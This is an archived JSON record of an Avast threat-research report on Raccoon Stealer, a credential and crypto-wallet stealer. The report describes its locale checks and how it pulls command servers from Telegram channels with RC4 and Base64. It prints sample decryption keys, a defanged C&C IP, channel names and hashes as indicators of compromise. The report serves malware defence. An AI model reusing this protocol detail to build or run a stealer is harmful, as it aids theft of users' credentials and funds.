{
	"id": "7616a103-b06d-493f-88b7-f2a98c356577",
	"created_at": "2026-04-06T00:09:50.650567Z",
	"updated_at": "2026-04-10T13:11:20.923438Z",
	"deleted_at": null,
	"sha1_hash": "fb27206c3d270287b3f269dce66e5c1420d4b35a",
	"title": "Raccoon Stealer: “Trash panda” abuses Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2357463,
	"plain_text": "Raccoon Stealer: “Trash panda” abuses Telegram\r\nBy Threat Research TeamThreat Research Team\r\nArchived: 2026-04-05 12:48:42 UTC\r\nWe recently came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the\r\nTelegram infrastructure to store and update actual C\u0026C addresses. \r\nRaccoon Stealer is a password stealer capable of stealing not just passwords, but various types of data, including:\r\nCookies, saved logins and forms data from browsers\r\nLogin credentials from email clients and messengers\r\nFiles from crypto wallets\r\nData from browser plugins and extension\r\nArbitrary files based on commands from C\u0026C\r\nIn addition, it’s able to download and execute arbitrary files by command from its C\u0026C. In combination with active\r\ndevelopment and promotion on underground forums, Raccoon Stealer is prevalent and dangerous.\r\nThe oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019 . Its authors have stated\r\nthe same month as the start of selling the malware on underground forums. Since then, it has been updated many times.\r\nAccording to its authors, they fixed bugs, added features, and more.\r\nDistribution\r\nWe’ve seen Raccoon distributed via downloaders: Buer Loader and GCleaner . According to some samples, we believe it\r\nis also being distributed in the form of fake game cheats , patches for cracked software (including hacks and mods for\r\nFortnite , Valorant , and NBA2K22 ), or other software. Taking into account that Raccoon Stealer is for sale, it’s\r\ndistribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while\r\nsome are protected using Themida or malware packers. Worth noting is that some samples were packed more than five\r\ntimes in a row with the same packer! \r\nTechnical details\r\nRaccoon Stealer is written in C/C++ and built using Visual Studio . Samples have a size of about 580-600 kB . The code\r\nquality is below average, some strings are encrypted, some are not.\r\nOnce executed, Racoon Stealer starts checking for the default user locale set on the infected device and won’t work if it’s\r\none of the following:\r\nRussian\r\nUkrainian\r\nBelarusian\r\nKazakh\r\nKyrgyz\r\nArmenian\r\nTajik\r\nUzbek\r\nC\u0026C communications\r\nThe most interesting thing about this stealer is its communication with C\u0026Cs. There are four values crucial for its C\u0026C\r\ncommunication, which are hardcoded in every Raccoon Stealer sample:\r\nMAIN_KEY . This value has been changed four times during the year.\r\nURLs of Telegram gates with channel name. Gates are used not to implement a complicated Telegram protocol and\r\nnot to store any credentials inside samples\r\nBotID – hexadecimal string, sent to the C\u0026C every time\r\nTELEGRAM_KEY – a key to decrypt the C\u0026C address obtained from Telegram Gate\r\nLet’s look at an example to see how it works:\r\n447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b unpacked to:\r\nf1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232 :\r\n1. First of all, MAIN_KEY is decrypted. See the decryption code in the image below:\r\nhttps://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nPage 1 of 4\n\nIn this example, the MAIN_KEY is jY1aN3zZ2j . This key is used to decrypt Telegram Gates URLs and BotID .\r\n2. This example decodes and decrypts Telegram Gate URLs. It is stored in the sample as:\r\nRf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQ\r\nAfter decoding Base64 it has this form:\r\nDecrypting this binary data with RC4 using MAIN_KEY gives us a string with Telegram Gates:\r\n3. The stealer has to get it’s real C\u0026C. To do so, it requests a Telegram Gate, which returns an HTML-page:\r\nHere you can see a Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32\r\nThe prefix (always five characters) and postfix (always six characters) are removed and it becomes\r\nmD/ry6GYdwNuXl10SYoVBR7/tFgp The Base64 is then decoded to obtain an encrypted C\u0026C URL:\r\nThe TELEGRAM_KEY in this sample is a string 739b4887457d3ffa7b811ce0d03315ce and the Raccoon uses it as a key to\r\nRC4 algorithm to finally decrypt the C\u0026C URL: http://91.219.236[.]18/\r\n4. Raccoon makes a query string with PC information (machine GUID and user name), and BotID\r\n5. Query string is encrypted with RC4 using a MAIN_KEY and then encoded with Base64.\r\n6. This data is sent using POST to the C\u0026C, and the response is encoded with Base64 and encrypted with the\r\nMAIN_KEY . Actually, it’s a JSON with a lot of parameters and it looks like this:\r\nThus, the Telegram infrastructure is used to store and update actual C\u0026C addresses. It looks quite convenient and reliable\r\nuntil Telegram decides to take action. \r\nAnalysis\r\nThe people behind Raccoon Stealer\r\nBased on our analysis of seller messages on underground forums, we can deduce some information about the people behind\r\nthe malware. Raccoon Stealer was developed by a team, some (or maybe all) members of the team are Russian native\r\nspeakers. Messages on the forum are written in Russian, and we assume they are from former USSR countries because they\r\ntry to prevent the Stealer from targeting users in these countries.\r\nPossible names/nicknames of group members may be supposed based on the analysis of artifacts, found in samples:\r\nhttps://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nPage 2 of 4\n\nC:\\Users\\a13xuiop1337\\\r\nC:\\Users\\David\\\r\nPrevalence\r\nRaccoon Stealer is quite prevalent: from March 3, 2021 - February 17, 2022 our systems detected more than 25,000\r\nRaccoon-related samples. We identified more than 1,300 distinct configs during that period.\r\n \r\nHere is a map, showing the number of systems Avast protected from Raccoon Stealer from March 3, 2021 - February 17,\r\n2022 . In this time frame, Avast protected nearly 600,000 Raccoon Stealer attacks.\r\nThe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware\r\ndon’t want to infect computers in Russia or Central Asia. We believe the attacks spray and pray, distributing the malware\r\naround the world. It’s not until it makes it onto a system that it begins checking for the default locale. If it is one of the\r\nlanguage listed above, it won’t run. This explains why we detected so many attack attempts in Russia, we block the malware\r\nbefore it can run, ie. before it can even get to the stage where it checks for the device’s locale. If an unprotected device that\r\ncomes across the malware with its locale set to English or any other language that is not on the exception list but is in\r\nRussia, it would stiIl become infected. \r\nScreenshot with claims about not working with CIS\r\nTelegram Channels\r\nFrom the more than 1,300 distinct configs we extracted, 429 of them are unique Telegram channels. Some of them were\r\nused only in a single config, others were used dozens of times. The most used channels were:\r\njdiamond13 – 122 times\r\njjbadb0y – 44 times\r\nnixsmasterbaks2 – 31 times\r\nhellobyegain – 25 times\r\nh_smurf1kman_1 – 24 times\r\nThus, five of the most used channels were found in about 19% of configs.\r\nMalware distributed by Raccoon\r\nAs was previously mentioned, Raccoon Stealer is able to download and execute arbitrary files from a command from C\u0026C.\r\nWe managed to collect some of these files. We collected 185 files , with a total size 265 Mb , and some of the groups are:\r\nDownloaders – used to download and execute other files\r\nClipboard crypto stealers – change crypto wallet addresses in the clipboard – very popular (more than 10%)\r\nWhiteBlackCrypt Ransomware\r\nServers used to download this software\r\nWe extracted unique links to other malware from Raccoon configs received from C\u0026Cs, it was 196 unique URLs . Some\r\nanalysis results:\r\n43% of URLs have HTTP scheme, 57% – HTTPS .\r\n83 domain names were used.\r\nhttps://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nPage 3 of 4\n\nAbout 20% of malware were placed on Discord CDN\r\nAbout 10% were served from aun3xk17k[.]space\r\nConclusion\r\nWe will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C\u0026Cs, Telegram channels, and downloaded\r\nsamples. We predict it may be used wider by other cybercrime groups. We assume the group behind Raccoon Stealer will\r\nfurther develop new features, including new software to steal data from, for example, as well as bypass protection this\r\nsoftware has in place.\r\nIoC\r\n447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b\r\nf1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232\r\nA group of elite researchers who like to stay under the radar.\r\nSource: https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nhttps://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram"
	],
	"report_names": [
		"raccoon-stealer-trash-panda-abuses-telegram"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775826680,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.pdf",
		"text": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.txt",
		"img": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.jpg"
	}
}